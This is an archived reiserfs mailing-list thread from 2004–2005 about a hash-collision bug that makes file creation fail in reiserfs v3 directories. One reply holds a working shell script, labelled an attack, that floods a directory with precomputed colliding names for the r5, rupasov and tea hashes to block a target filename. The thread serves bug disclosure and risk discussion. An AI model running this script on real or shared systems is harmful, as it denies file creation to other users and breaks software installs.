* Congratulations! we have got hash function screwed up
@ 2004-12-28 22:12 Lehmann
2004-12-29 18:55 ` Stefan Traby
2005-01-06 12:45 ` Alex Zarochentsev
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2004-12-28 22:12 UTC (permalink / raw)
To: reiserfs-list; +Cc: stefan
Hi!
When trying to upgrade or reinstall the xfonts-75dpi,
xfonts-75dpi-transcoded or 100dpi & transcoded debian packages on my
2.6.10-rc3 amd64 reiserfsv3 host, I get the following errors:
dpkg: error processing
/var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb (--unpack):
unable to make backup link of
`./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-1.pcf.gz' before
installing new version: Device or resource busy
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Preparing to replace xfonts-75dpi-transcoded 4.3.0.dfsg.1-10 (using
.../xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb) ...
dpkg: error processing /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb (--unpack):
unable to make backup link of `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-10.pcf.gz' before installing new version: Device or resource busy
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Errors were encountered while processing:
/var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb
/var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb
And at the same time, I get this in my kernel log:
ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
generic bug in handling hash collisions?
Deleting the fonts and installing the package works, but the next upgrade
makes the error appear again.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
@ 2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
2005-01-06 12:45 ` Alex Zarochentsev
1 sibling, 2 replies; 26+ messages in thread
From: Stefan Traby @ 2004-12-29 18:55 UTC (permalink / raw)
To: Marc A. Lehmann ; +Cc: reiserfs-list, stefan
On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
> ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
>
> Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> generic bug in handling hash collisions?
I can confirm that with 2.6.10.
It is independent of hash function (r5, rupasov, tea) used.
Here is a script that works independently of the hash (feel free to forward it to
bugtraq - it's a showstopper bug):
#! /bin/sh
# reiserfs v3 denial of "00000000" creation attack (hash collisions)
# insider: EHASHCOLLISION EAGAIN!
#
ATTACK=00000000
R5="
000003435823 000022067556 000040799289 000047672563 000079051844 000097783577
000119162858 000125037032 000137894590 000156516313 000169273871 000175148046
000193879879 000209384885 000228006608 000246738340 000252611615 000259495899
000278117621 000296849354 000305480087 000311354361 000318228635 000342833642
000361465375 000374212923 000392944656 000401576389 000414323937 000439929944
000445803118 000464434950 000470309125 000483066683 000504545964 000523177697
000560530152 000567404427 000573288700 000598893708 000600641166 000607515440
000626147173 000632020447 000657626454 000676258187 000689005735 000729116749
000747848481 000753721756 000779227762 000797959495 000806590218 000819338776
000843943783 000862575506 000888080512 000921308252 000934065800 000946913259
000952797533 000971419266 000984176814 001008625581 001027257304 001033130588
001051862310 001058736595 001070494043 001077368318 001117479331 001136100064
001148958612 001154831897 001160706070 001186211078 001213574633 001226322091
001257801372 001263685647 001289190653 001295064928 001303796660 001316544109
001322418393 001335175941 001366655122 001385286955 001406766136 001425397969
001431271143 001462750424 001481382157 001502861438 001509735712 001521493170
001528367445 001534240719 001552972451 001559846726 001578478459 001611705198
001618589472 001661816201 001687321209 001714684774 001727432222 001758911503
001764795788 001777543236 001783417510 001823528524 001849033530 001867765263
001873639538 001892270270 001907876277 001932381284 001945129832 001951003007
001963860565 001976609013 001982492298 002012815329 002019699603 002031447061
002038320336 002050078894 002062926342 002081558075"
RUPASOV="
000000000000 000016777216 000033554432 000050331648 000067108864 000083886080
000100663296 000117440512 000134217728 000150994944 000167772160 000184549376
000201326592 000218103808 000234881024 000251658240 000268435456 000285212672
000301989888 000318767104 000335544320 000352321536 000369098752 000385875968
000402653184 000419430400 000436207616 000452984832 000469762048 000486539264
000503316480 000520093696 000536870912 000553648128 000570425344 000587202560
000603979776 000620756992 000637534208 000654311424 000671088640 000687865856
000704643072 000721420288 000738197504 000754974720 000771751936 000788529152
000805306368 000822083584 000838860800 000855638016 000872415232 000889192448
000905969664 000922746880 000939524096 000956301312 000973078528 000989855744
001006632960 001023410176 001040187392 001056964608 001073741824 001090519040
001107296256 001124073472 001140850688 001157627904 001174405120 001191182336
001207959552 001224736768 001241513984 001258291200 001275068416 001291845632
001308622848 001325400064 001342177280 001358954496 001375731712 001392508928
001409286144 001426063360 001442840576 001459617792 001476395008 001493172224
001509949440 001526726656 001543503872 001560281088 001577058304 001593835520
001610612736 001627389952 001644167168 001660944384 001677721600 001694498816
001711276032 001728053248 001744830464 001761607680 001778384896 001795162112
001811939328 001828716544 001845493760 001862270976 001879048192 001895825408
001912602624 001929379840 001946157056 001962934272 001979711488 001996488704
002013265920 002030043136 002046820352 002063597568 002080374784 002097152000
002113929216 002130706432 002147483648 002164260864"
TEA="
000004464160 000041804440 000080240100 000091329029 000104181015 000113725885
000126527488 000140392446 000158910938 000228997445 000230956744 000265118409
000278488948 000294393023 000295253722 000300066283 000302103786 000330187358
000345002932 000351581026 000363320013 000366148241 000398298703 000411084407
000430270876 000450889104 000457353842 000459620112 000464658163 000465039241
000472966466 000479773493 000485638992 000490029225 000519300138 000523222490
000543871739 000550161091 000614863063 000628859470 000658101403 000705881242
000707428465 000709541412 000710835913 000712765852 000747815906 000751391777
000758206682 000759473821 000761493018 000807141251 000819925766 000822342439
000844968698 000846939644 000856679997 000862332598 000897273990 000903164600
000959685453 000966591643 000975714799 001026819859 001030872126 001052008464
001101513177 001111878931 001114914486 001126417564 001134342742 001145636506
001156983946 001160376993 001181076193 001187045552 001229906330 001237307675
001240018281 001248584794 001258422117 001295880517 001329389368 001334233160
001350505390 001377143821 001393244657 001501373481 001530260023 001544062865
001610909439 001642156853 001659354644 001663482837 001665935205 001709618183
001759947280 001787829412 001793154973 001822800512 001896514533 001927905568
001943169212 001959135151 001971173446 001990765252 001994429464 002029003899
002067143236 002083825957 002092102503 002097735725 002117257216 002119310814
002135908515 002158320625 002167193043 002172339658 002184965785 002188948362
002206033194 002206592488 002207146649 002209003597 002219996827 002235862165
002237358329 002267747802 002273109830 002284855435"
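# Create all colliding names for the three hashes (the lists are left
# unquoted on purpose so they split into one name per word).
for i in $RUPASOV $R5 $TEA ; do
    touch "$i"
done
# Now try to create the target name.
touch "$ATTACK"
if [ ! -f "$ATTACK" ] ; then
    echo "FATAL: can't create $ATTACK"
fi
# Remove the colliding names again.
rm -f $RUPASOV $R5 $TEA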
Dec 28 23:38:24 kotzmaster kernel: ReiserFS: loop0: Using rupasov hash to sort names
Dec 29 00:38:59 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Dec 29 00:40:17 kotzmaster kernel: ReiserFS: loop0: Using tea hash to sort names
Dec 29 00:40:22 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Dec 29 00:41:16 kotzmaster kernel: ReiserFS: loop0: Using r5 hash to sort names
Dec 29 00:41:23 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
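To see which names the filesystem actually refuses, the loop can be wrapped in a small helper. This is only a sketch: `try_create` is a hypothetical name, not part of the script above, and it reports any failed `touch`, whatever the cause.

```sh
#!/bin/sh
# try_create DIR NAME...
# Hypothetical helper: touch every NAME inside DIR and print each name
# that could not be created (for any reason, not only hash collisions).
try_create() {
    tc_dir=$1
    shift
    for tc_name in "$@"; do
        touch "$tc_dir/$tc_name" 2>/dev/null || echo "$tc_name"
    done
}
```

With the variables from the script defined, something like `try_create /mnt/test $R5 "$ATTACK"` (where `/mnt/test` is an assumed mount point of a scratch reiserfs v3 filesystem) would list the refused names.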
--
ciao -
Stefan
" GNU's Not Unix -- IIS Isn't Secure "
* Re: Congratulations! we have got hash function screwed up
2004-12-29 18:55 ` Stefan Traby
@ 2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
1 sibling, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 21:04 UTC (permalink / raw)
To: Stefan Traby; +Cc: reiserfs-list
On Wed, Dec 29, 2004 at 07:55:29PM +0100, Stefan Traby <stefan@hello-penguin.com> wrote:
> On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
>
> > ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
> >
> > Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> > generic bug in handling hash collisions?
>
> I can confirm that with 2.6.10.
> It is independent of hash function (r5, rupasov, tea) used.
Interesting, I would have hoped it's not so easy to generate
collisions. Now that a debian package creates collisions, this issue has
become very real.
Another note: It seems that the error returned is wrong. I would expect
ENOSPC if reiserfs runs out of (key-)space, not EBUSY or whatever it
returns.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
@ 2004-12-29 21:05 ` Hans Reiser
2004-12-29 21:43 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2004-12-29 21:05 UTC (permalink / raw)
To: Stefan Traby; +Cc: Marc A. Lehmann, reiserfs-list
Stefan Traby wrote:
>
>
>Here a script that works independent of hash (feel free to forward it to
>bugtraq - it's a showstopper bug):
>
>
It is not independent of hash, it is hardcoded to be hash specific. It
is not a showstopper bug --- almost nobody cared about it for the last 5
years. If you don't accept that quality of service condition on
filename creation, use reiser4 or ext3.
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:05 ` Hans Reiser
@ 2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
2004-12-30 2:05 ` Hans Reiser
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 21:43 UTC (permalink / raw)
To: Hans Reiser; +Cc: Stefan Traby, reiserfs-list
On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> Stefan Traby wrote:
>
> >
> >
> >Here a script that works independent of hash (feel free to forward it to
> >bugtraq - it's a showstopper bug):
> >
> >
> is not a showstopper bug
If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
xfonts-100 are not unimportant packages), I'd call this a showstopper
indeed *g*.
> --- almost nobody cared about it for the last 5
> years.
This is a lame excuse for a bug - after all, you promoted reiserfs as being
capable of storing many files in one directory instead of having to rely on
directory hierarchies for e.g. squid and other apps. But exactly that is not
possible with reiserfs, as too many files in one directory == collisions.
Also, it's a lie that nobody cared about this; after all, there had been
earlier reports.
And last but not least, most apps do not create many files in one directory by
default, for compatibility with other filesystems, where this is too slow.
> If you don't accept that quality of service condition on filename
> creation,
Again, this is a lame excuse for a bug. First you declare some features on
your filesystem, later, when it turns out that it isn't being delivered,
you act as if this were a known condition.
(Even if it were ok to fail file creation, the error generated is still
wrong. It is a bug, no matter how you try to twist it).
> use reiser4 or ext3.
reiser4 is, of course, still far from being stable enough for such uses.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:43 ` Lehmann
@ 2004-12-29 21:46 ` Christian Iversen
2004-12-29 22:27 ` Lehmann
2004-12-30 2:05 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: Christian Iversen @ 2004-12-29 21:46 UTC (permalink / raw)
To: reiserfs-list
On Wednesday 29 December 2004 22:43, Marc A. Lehmann <pcg@goof.com> wrote:
> On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> > Stefan Traby wrote:
> > >Here a script that works independent of hash (feel free to forward it to
> > >bugtraq - it's a showstopper bug):
> >
> > is not a showstopper bug
>
> If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
> xfonts-100 are not unimportant packages), I'd call this a showstopper
> indeed *g*.
Under what conditions does this occur? I have 5 installs of debian linux on
reiserfs here at home, and I have never had such problems. Is it only in
directories with thousands of other files?
--
Regards,
Christian Iversen
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:46 ` Christian Iversen
@ 2004-12-29 22:27 ` Lehmann
0 siblings, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 22:27 UTC (permalink / raw)
To: Christian Iversen; +Cc: reiserfs-list
On Wed, Dec 29, 2004 at 10:46:46PM +0100, Christian Iversen <chrivers@iversen-net.dk> wrote:
> > On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> > > Stefan Traby wrote:
> > > >Here a script that works independent of hash (feel free to forward it to
> > > >bugtraq - it's a showstopper bug):
> > >
> > > is not a showstopper bug
> >
> > If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
> > xfonts-100 are not unimportant packages), I'd call this a showstopper
> > indeed *g*.
>
> Under what conditions does this occur?
Under the conditions that I already wrote about: when upgrading an
existing xfonts-75dpi package. Installing works fine, upgrading does not,
presumably because dpkg creates a backup copy of every file upgraded
first, which then exceeds some internal reiserfs limit.
> I have 5 installs of debian linux on
> reiserfs here at home, and I have never had such problems. Is it only in
> directories with thousands of other files?
As I understand the bug, it happens when too many filenames in the same
directory happen to hash to the same value - reiserfs requires the hash of
filenames to be "unique enough", otherwise it will not be able to create
more files with the same hashed name.
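A rough sketch of that mechanism for the r5 hash follows. It assumes, from a reading of the reiserfs v3 source and not from anything stated in this thread, that r5 folds each byte in as `a = (a + (c << 4) + (c >> 4)) * 11` in 32-bit arithmetic, and that only the bits selected by the mask 0x7fffff80 place a name in the directory, which leaves 7 bits to tell apart names with the same value. The function names are made up for this example, and it only handles ASCII names.

```sh
#!/bin/sh
# r5_hash NAME: print the 32-bit r5 hash of an ASCII name (sketch).
r5_hash() {
    r5_s=$1
    r5_a=0
    while [ -n "$r5_s" ]; do
        r5_c=${r5_s%"${r5_s#?}"}          # first character
        r5_s=${r5_s#?}                    # remaining characters
        r5_v=$(printf '%d' "'$r5_c")      # character code
        r5_a=$(( ((r5_a + (r5_v << 4) + (r5_v >> 4)) * 11) & 4294967295 ))
    done
    echo "$r5_a"
}

# dir_hash NAME: keep only the bits assumed to be used as the directory
# key (mask 0x7fffff80 = 2147483520).
dir_hash() {
    echo $(( $(r5_hash "$1") & 2147483520 ))
}

# Two names taken from the R5 list posted earlier in the thread:
dir_hash 00000000
dir_hash 000003435823
```

Both calls print the same value, which is what makes the two names compete for the same small set of slots under these assumptions.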
As the examples show, getting collisions is pretty straightforward and
easy, even with the tea hash (I can faintly remember hans reiser claiming
that this bug has been solved some years ago, and indeed this is the first
time it really bites me, albeit with a very real example).
As such, reiserfs v3 is not suitable for server operations, where such
irregular behaviour simply must not occur - consider this happening when
installing a kernel package, leaving your system in a non-bootable state
or so.
My specific case might depend on other packages - as I maintain some
i18n'ed software I have lots of extra font packages installed, although
I doubt many of them will end up in the 75dpi directory, but it might
be that my 75dpi and 100dpi dirs might be somewhat crowded - they both
contain 1888 files with similar names (and the standard hash, r5, is very
susceptible to similar names leading to similar hashes).
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
@ 2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
1 sibling, 2 replies; 26+ messages in thread
From: Hans Reiser @ 2004-12-30 2:05 UTC (permalink / raw)
To: reiserfs-list; +Cc: Stefan Traby
Marc A. Lehmann <pcg@goof.com> wrote:
>
>
>Again, this is a lame excuse for a bug. First you declare some features on
>your filesystem, later, when it turns out that it isn't being delivered,
>you act as if this were a known condition.
>
>
Well this is true, you are right. Reiser4 is the fix though.
>(Even if it were ok to fail file creation, the error generated is still
>wrong. It is a bug, no matter how you try to twist it).
>
>
Blame Alan Cox for that, he changed it from -EHASHCOLLISION (or some
such error I invented, I forget) over my objections.
* Re: Congratulations! we have got hash function screwed up
2004-12-30 2:05 ` Hans Reiser
@ 2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
1 sibling, 0 replies; 26+ messages in thread
From: Matthias Andree @ 2004-12-30 10:22 UTC (permalink / raw)
To: Hans Reiser; +Cc: reiserfs-list, Stefan Traby
Hans Reiser <reiser@namesys.com> writes:
>>Again, this is a lame excuse for a bug. First you declare some features on
>>your filesystem, later, when it turns out that it isn't being delivered,
>>you act as if this were a known condition.
>>
> Well this is true, you are right. Reiser4 is the fix though.
No, it isn't. Reiser4 is an alternative beast. Or will it transparently
"fix" the collision problem in a 3.5 or 3.6 file system, in a way that
is backwards compatible with 3.6 drivers? If not, please fix reiser3.6.
Given that Reiser4 isn't "proven" yet in the field (for that, it would
have to be used as the default file system by at least one major
distributor for at least a year), it is certainly not an option for
servers _yet_.
A file system that refuses to create a new file for non-transparent reasons
(i.e. not inode count or block count) doesn't belong on _my_ production
machines, which shall migrate away from reiserfs on the next suitable
occasion (such as upgrades). There's ext3fs, jfs, xfs, and in 2006 or
2007, we'll talk about reiser4 again. Yes, I am conservative WRT file
systems and storage.
--
Matthias Andree
* Re: Congratulations! we have got hash function screwed up
2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
@ 2004-12-30 17:02 ` Lehmann
1 sibling, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-30 17:02 UTC (permalink / raw)
To: Hans Reiser; +Cc: reiserfs-list, Stefan Traby
On Wed, Dec 29, 2004 at 06:05:59PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> >
> >Again, this is a lame excuse for a bug. First you declare some features on
> >your filesystem, later, when it turns out that it isn't being delivered,
> >you act as if this were a known condition.
> >
> >
> Well this is true, you are right. Reiser4 is the fix though.
So that's what happens to the filesystems you develop once you have a new toy. Good
to know when planning my next server :)
> >(Even if it were ok to fail file creation, the error generated is still
> >wrong. It is a bug, no matter how you try to twist it).
> >
> Blame Alan Cox for that, he changed it from -EHASHCOLLISION (or some
> such error I invented, I forget) over my objections.
Blaming Cox for trying to fix your code and not getting it completely
right is not nice. After all, Cox also found that the error code is
inadequate. The point is that EBUSY is still bad, for open. ENOSPC is a
much better code, as it is a documented error code for open, whereas EBUSY
is not.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
2004-12-29 18:55 ` Stefan Traby
@ 2005-01-06 12:45 ` Alex Zarochentsev
2005-01-06 14:27 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Alex Zarochentsev @ 2005-01-06 12:45 UTC (permalink / raw)
To: Marc A. Lehmann ; +Cc: reiserfs-list, stefan
Hello,
On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
> Hi!
>
> When trying to upgrade or reinstall the xfonts-75dpi,
> xfonts-75dpi-transcoded or 100dpi & transcoded debian packages on my
> 2.6.10-rc3 amd64 reiserfsv3 host, I get the following errors:
>
> dpkg: error processing
> /var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb (--unpack):
> unable to make backup link of
> `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-1.pcf.gz' before
> installing new version: Device or resource busy
> dpkg-deb: subprocess paste killed by signal (Broken pipe)
> Preparing to replace xfonts-75dpi-transcoded 4.3.0.dfsg.1-10 (using
> .../xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb) ...
> dpkg: error processing /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb (--unpack):
> unable to make backup link of `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-10.pcf.gz' before installing new version: Device or resource busy
> dpkg-deb: subprocess paste killed by signal (Broken pipe)
> Errors were encountered while processing:
> /var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb
> /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb
>
> And at the same time, I get this in my kernel log:
>
> ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
>
> Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> generic bug in handling hash collisions?
Tea hash is designed to be more resistant.
There is a generic problem with overflowing the generation counter, but
tea hash should mix file names better and have less chance to 'screw the hash
function up'.
Does Debian install all X font files into one dir? Maybe you have your own
font files installed in the same dir? I suggest splitting the dir into several
ones.
> Deleteing the fonts and installing the package works, but the next upgrade
> makes the error appear again.
>
> --
> The choice of a
> -----==- _GNU_
> ----==-- _ generation Marc Lehmann
> ---==---(_)__ __ ____ __ pcg@goof.com
> --==---/ / _ \/ // /\ \/ / http://schmorp.de/
> -=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
--
Alex.
* Re: Congratulations! we have got hash function screwed up
2005-01-06 12:45 ` Alex Zarochentsev
@ 2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2005-01-06 14:27 UTC (permalink / raw)
To: Alex Zarochentsev; +Cc: reiserfs-list, stefan
On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
> > generic bug in handling hash collisions?
>
> Tea hash is designed to be more resistant.
As the example posted shows, tea doesn't look better, it generates
nicely-looking collisions, too.
> Does the debian install all X font files into one dir?
No, but xfree nowadays comes with a lot of fonts because it stupidly makes
a copy of about each and every font in each and every encoding, leading to
many font files in the bitmapped category (75dpi and 100dpi).
> May be you have your own font files installed in the same dir?
I also have some other debian packages that install their fonts there, but
it should be less than 10 extra files.
> I suggest to split the dir into several ones.
I'd suggest getting rid of reiserfs on anything important. I can't have it
when my filesystem randomly returns errors when it should be working.
I wonder whether this has any security relevance, as it allows attackers
to easily create filename holes in the filesystem that even root cannot
override.
Thanks for the suggestion, though! However, the workaround I currently use
(delete the dir, reinstall) works better, as it doesn't destroy debian's
idea of the filesystem layout.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
* Re: Congratulations! we have got hash function screwed up
2005-01-06 14:27 ` Lehmann
@ 2005-01-06 15:56 ` Hans Reiser
2005-01-06 16:13 ` Spam
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
1 sibling, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-06 15:56 UTC (permalink / raw)
To: reiserfs-list; +Cc: Alex Zarochentsev, stefan
Marc A. Lehmann <pcg@goof.com> wrote:
>On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
>
>
>>>generic bug in handling hash collisions?
>>>
>>>
>>Tea hash is designed to be more resistant.
>>
>>
>
>As the example posted shows, tea doesn't look better, it generates
>nicely-looking collisions, too.
>
>
You mean, in practice you hit them, or with an artificially generated
set of filenames intended to cause collisions you get those collisions?
* Re: Congratulations! we have got hash function screwed up
2005-01-06 15:56 ` Hans Reiser
@ 2005-01-06 16:13 ` Spam
2005-01-06 16:26 ` Chris Dukes
0 siblings, 1 reply; 26+ messages in thread
From: Spam @ 2005-01-06 16:13 UTC (permalink / raw)
To: reiserfs-list
>>>>generic bug in handling hash collisions?
>>>>
>>>>
>>>Tea hash is designed to be more resistant.
>>>
>>>
>>
>>As the example posted shows, tea doesn't look better, it generates
>>nicely-looking collisions, too.
>>
>>
> You mean, in practice you hit them, or with an artificially generated
> set of filenames intended to cause collisions you get those collisions?
Excuse me, but do you mean that there are undocumented limits on what
files can be named, and on how many files with similar or random
names can exist in a ReiserFS volume?
This sounds bad...
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:13 ` Spam
@ 2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
2005-01-07 17:22 ` Hans Reiser
0 siblings, 2 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-06 16:26 UTC (permalink / raw)
To: Spam; +Cc: reiserfs-list
On Thu, Jan 06, 2005 at 05:13:23PM +0100, Spam wrote:
> >>>>generic bug in handling hash collisions?
> >>>>
> >>>>
> >>>Tea hash is designed to be more resistant.
> >>>
> >>>
> >>
> >>As the example posted shows, tea doesn't look better, it generates
> >>nicely-looking collisions, too.
> >>
> >>
> > You mean, in practice you hit them, or with an artificially generated
> > set of filenames intended to cause collisions you get those collisions?
>
> Excuse me, but do you mean that there are undocumented limits on what
> files can be named to, and how many files with similar or random
> names in a ReiferFS volume?
No, I'd say it's pretty well documented that reiserfs fails under
certain hash collision conditions instead of continuing to work
(albeit more slowly).
The nature of the hash collisions must be pretty obvious if a shell
script can be written to demonstrate the problem.
>
> This sounds bad...
It's a risk assessment. What are the odds of your normal data sets
hitting the bug or of someone with malicious intent introducing
a demonstration program vs the performance hit of a filesystem
without the problem?
All filesystems will fail or suffer degraded performance under
certain conditions, you need to determine what conditions are acceptable
for your data.
--
Chris Dukes
Warning: Do not use the reflow toaster oven to prepare foods after
it has been used for solder paste reflow.
http://www.stencilsunlimited.com/stencil_article_page5.htm
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:26 ` Chris Dukes
@ 2005-01-06 16:29 ` Spam
2005-01-06 16:56 ` Chris Dukes
2005-01-07 17:22 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: Spam @ 2005-01-06 16:29 UTC (permalink / raw)
To: reiserfs-list
> On Thu, Jan 06, 2005 at 05:13:23PM +0100, Spam wrote:
>> >>>>generic bug in handling hash collisions?
>> >>>>
>> >>>>
>> >>>Tea hash is designed to be more resistant.
>> >>>
>> >>>
>> >>
>> >>As the example posted shows, tea doesn't look better, it generates
>> >>nicely-looking collisions, too.
>> >>
>> >>
>> > You mean, in practice you hit them, or with an artificially generated
>> > set of filenames intended to cause collisions you get those collisions?
>>
>> Excuse me, but do you mean that there are undocumented limits on what
>> files can be named to, and how many files with similar or random
>> names in a ReiferFS volume?
> No, I'd say it's pretty well documented that reiserfs fails under
> certain hash collision conditions instead of continueing to work
> (albeit more slowly).
> The nature of the hash collisions must be pretty obvious if a shell
> script can be written to demonstrate the problem.
>>
>> This sounds bad...
> It's a risk assessment. What are the odds of your normal data sets
> hitting the bug or of someone with malicious intent introducing
> a demonstration program vs the performance hit of a filesystem
> without the problem.
How can I assess the risk, if I do not know how to produce the bugs?
You say certain conditions. But from what I read earlier in the
thread, a directory with fonts in it...?
> All filesystems will fail or suffer degraded performance under
> certain conditions, you need to determine what conditions are acceptable
> for your data.
Slow can be acceptable. But failing? No, a filesystem should not
fail.
--
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:29 ` Spam
@ 2005-01-06 16:56 ` Chris Dukes
0 siblings, 0 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-06 16:56 UTC (permalink / raw)
To: Spam; +Cc: reiserfs-list
On Thu, Jan 06, 2005 at 05:29:39PM +0100, Spam wrote:
>
> > It's a risk assessment. What are the odds of your normal data sets
> > hitting the bug or of someone with malicious intent introducing
> > a demonstration program vs the performance hit of a filesystem
> > without the problem.
>
> How can I assess the risk, if I do not know how to produce the bugs?
> You say certain conditions. But from what I read earlier in the
> thread, a directory with a fonts in them.....?
Since the concepts of simulators, hash function analysis, and dataset
modelling seem to escape you, perhaps you need to go for the black
and white "Is any risk acceptable," given anecdotal data of one
unexpected failing condition and one script that can regularly create
the failing condition.
>
> > All filesystems will fail or suffer degraded performance under
> > certain conditions, you need to determine what conditions are acceptable
> > for your data.
>
> Slow can be acceptable. But failing? No, a filesystem should not
> fail.
It should not fail
1) When media fails
2) When transport hardware is not compliant with specs (permanently on
write caching anyone?)
3) Media has a limited lifetime
...
One thing I don't think I ever saw in this thread was
1) How old was the drive that saw the problem.
2) What was the drive lifetime used to calculate its MTBF.
--
Chris Dukes
Warning: Do not use the reflow toaster oven to prepare foods after
it has been used for solder paste reflow.
